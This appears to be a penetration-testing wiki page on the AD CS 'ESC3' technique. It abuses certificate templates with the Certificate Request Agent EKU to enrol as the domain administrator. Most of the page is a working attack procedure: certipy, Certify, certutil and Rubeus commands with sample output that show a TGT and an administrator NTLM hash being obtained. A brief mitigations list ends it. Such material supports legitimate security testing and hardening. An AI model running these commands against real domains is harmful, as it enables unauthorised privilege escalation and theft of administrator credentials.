ESC3

Description

ESC3 attacks make use of certificate templates that have EKU's that allow for "Certificate Request Agent". This EKU enables a principal to request a certificate on behalf of another user.

Requirements for attack path (1st condition)

Enrolment rights granted to a user or group for which we have access to
Manager approval not enabled
Authorized signatures are not required
Either the certificate EKU is set for "Certificate Request Agent". Or the certificate EKU is set for "Any Purpose"

Requirements for attack path (2nd condition)

Providing the above conditions are met for the certificate template with "Certificate Request Agent" EKU set. The following, second condition set needs to be met on a second template.

Enrolment rights granted to a user or group for which we have access to
Manager approval not enabled
The template defines an EKU which can be used for authentication for example "Client Authentication"
The template schema version is 1 or greater than 2 specifies an Application Policy Issuance Requirement that necessitates the Certificate Request Agent EKU.
No restrictions on enrollment agents are implemented at the CA level.

A likely candidate for the 2nd condition template is the default "User" template.

Linux - Enumeration

certipy find -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -enabled -stdout -vulnerable

Linux - Performing the attack

Perform the initial request to the identified certificate configued with the EKU "Certificate Request Agent".

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC3' -out cert

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Moe@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1105'
[*] Saved certificate and private key to 'cert.pfx'

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes Client Authentication in its Extended Key Usage (EKU) settings.

For accuracy and to avoid certificate mismatch issues we should always aim to provide the -sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'user' -on-behalf-of 'security\administrator' -sid S-1-5-21-13999771-2333344039-1820745628-500 -pfx cert.pfx

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 18
[*] Got certificate with UPN 'administrator@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'

Finally, use the certificate file to obtain the user credentials.

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100

[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bc

Windows - Enumeration

.\Certify.exe find /vulnerable

Identify certificates that can be used for client authentication

.\Certify.exe find /enabled /clientauth

Windows - Performing the attack

Request a certificate for the template vulnerable to ESC3.

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC3-P1

Take the private key and certificate output and place them into seperate files.

cert.key

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----

cert.pem

-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\cert.pem .\cert.pfx

For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:User /onbehalfof:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500 /enrollcert:cert.pfx

Aagin, take the new key and certificate output and place them into seperate files.

admin.key

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----

admin.pem

-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\admin.pem .\admin.pfx

# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials

# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap

< -- Snip -->

  ServiceName              :  krbtgt/security
  ServiceRealm             :  SECURITY.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  SECURITY.LOCAL
  StartTime                :  04/03/2025 19:25:09
  EndTime                  :  05/03/2025 05:25:09
  RenewTill                :  11/03/2025 19:25:09
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  30AP07EilJ/mM6LsDioVPw==
  ASREP (key)              :  C2E0C2C00D58B05671F7DA68F4D72796

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 2B576ACBE6BCFDA7294D6BD18041B8FE

Mitigations

Require manager aprovals on the certificate
Require authorized signatures
Remove weak enrollement permissions from the template
Replace "Any Purpose" (If configured) for a less descriptive one
Use Enrollment Agent restrictions on the Certificate Authority level. For example, you might want to restrict which users are allowed to act as an Enrollment Agent, and which templates can be requested.

Last updated 9 months ago